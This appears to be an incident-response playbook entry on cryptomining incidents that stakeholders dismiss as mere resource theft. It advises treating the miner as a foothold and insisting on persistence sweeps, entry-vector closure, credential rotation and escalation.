Mining Incident Treated as Low Priority by Stakeholders

Stakeholders frame unauthorized mining as "just a resource cost" and push for immediate process-kill and closure rather than a full investigation. This under-scoping routinely leaves the entry vector open and misses secondary compromise (webshells, backdoors, credential theft) the attacker installed alongside the miner.

Signals

•Stakeholder requests to "just kill it and move on" within hours of detection
•Service owners resist persistence sweep or credential rotation
•No documented plan for entry-vector remediation beyond the compromised host

Pivot Actions

1.Reframe the incident as a foothold compromise, not a resource-theft event: miners are commonly sold alongside access to broader compromise
2.Present the specific unknown risks (secondary tooling not yet ruled out, entry vector not yet closed) and the cost of learning the hard way weeks later
3.Insist on a minimum standard of care: persistence sweep, entry-vector closure, credential rotation on exposed accounts
4.Escalate to CISO or equivalent if local stakeholders continue to block full investigation

Alternate Evidence Sources

•Past peer-organization incidents where under-investigated mining incidents led to major compromise (publicly documented case studies)
•Threat-intel reports on miner families that carry secondary capabilities (Kinsing, Sysrv-hello, LemonDuck)

Related Procedures

Detect and Characterize Unauthorized Mining

triage

Analyze Mining Persistence and Secondary Tooling

analyze

Comprehensive Persistence Mechanism Sweep

eradicate